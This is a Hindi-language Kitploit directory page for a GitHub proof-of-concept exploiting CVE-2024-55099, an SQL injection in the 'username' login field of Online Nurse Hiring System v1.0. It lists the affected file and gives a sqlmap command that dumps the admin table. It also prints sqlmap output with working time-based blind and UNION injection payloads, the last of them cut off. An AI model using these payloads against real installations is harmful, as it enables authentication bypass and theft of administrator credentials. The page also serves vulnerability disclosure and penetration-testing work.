Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability- — CVE-2024-55099 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ऑनलाइन नर्स हायरिंग सिस्टम v1.0 में असैनिटाइज़्ड यूज़रनेम पैरामीटर के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है, जिससे डेटाबेस एन्यूमरेशन और प्रमाणीकरण बाईपास संभव होता है। | Kitploit
उपकरण/GitHubGitHub/ugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगArchived
GitHubugurkarakoc1/cve-2024-55099-online-nurse-hiring-system-v1.0-sql-injection-vulnerability-

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-SQL-Injection-Vulnerability-

CVE-2024-55099 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, ऑनलाइन नर्स हायरिंग सिस्टम v1.0 में असैनिटाइज़्ड यूज़रनेम पैरामीटर के माध्यम से SQL इंजेक्शन का प्रदर्शन करता है, जिससे डेटाबेस एन्यूमरेशन और प्रमाणीकरण बाईपास संभव होता है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-55099-Online-Nurse-Hiring-System-v1.0-एसक्यूएल-इंजेक्शन-कमजोरी

  • शोषण लेखक: ugurkarakoc

विक्रेता होमपेज

  • https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql

सॉफ्टवेयर लिंक

  • https://phpgurukul.com/?sdm_process_download=1&download_id=17826

अवलोकन

  • Online-Nurse-Hiring-System-v1.0 में 'username' पैरामीटर का अपर्याप्त इनपुट सत्यापन और स्वच्छता SQL इंजेक्शन हमलों की कमजोरी पैदा कर सकता है, जिससे डेटाबेस तक अनधिकृत पहुंच संभव होती है और सिस्टम सुरक्षा से समझौता होता है।

कमजोरी विवरण

  • CVE ID: CVE-2024-55099
  • प्रभावित संस्करण: Online-Nurse-Hiring-System-v1.0
  • कमजोर फ़ाइल: /admin/index.php.
  • पैरामीटर नाम: username
  • हमले का प्रकार: स्थानीय

संदर्भ:

  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-55099
  • https://nvd.nist.gov/vuln/detail/CVE-2024-55099
  • विवरण

    • 'username' पैरामीटर पर उचित इनपुट सत्यापन और स्वच्छता की कमी एक हमलावर को SQL इंजेक्शन क्वेरी बनाने, प्रमाणीकरण तंत्र को बायपास करने और डेटाबेस तक अनधिकृत पहुंच प्राप्त करने की अनुमति देती है।

    प्रमाण की अवधारणा (PoC) :

    • sqlmap -r r.txt -dbs --level 5 --risk 3 --batch -D onhsdb -T tbladmin --columns --dump
    root@kitploit:~
    ---
    पैरामीटर: username (POST)
        प्रकार: समय-आधारित ब्लाइंड
        शीर्षक: MySQL >= 5.0.12 AND समय-आधारित ब्लाइंड (query SLEEP)
        Payload: username=admin' AND (SELECT 3898 FROM (SELECT(SLEEP(5)))CrDy) AND 'rbGV'='rbGV&inputpwd=test&login=
    
        प्रकार: UNION क्वेरी
        शीर्षक: सामान्य UNION क्वेरी (NULL) - 2 कॉलम
        Payload: username=-6075' UNION ALL SELECT 68,CONCAT(0x7176706a71,0x7168445671545a434e
    ---
    

    image

    टूल डाउनलोड करें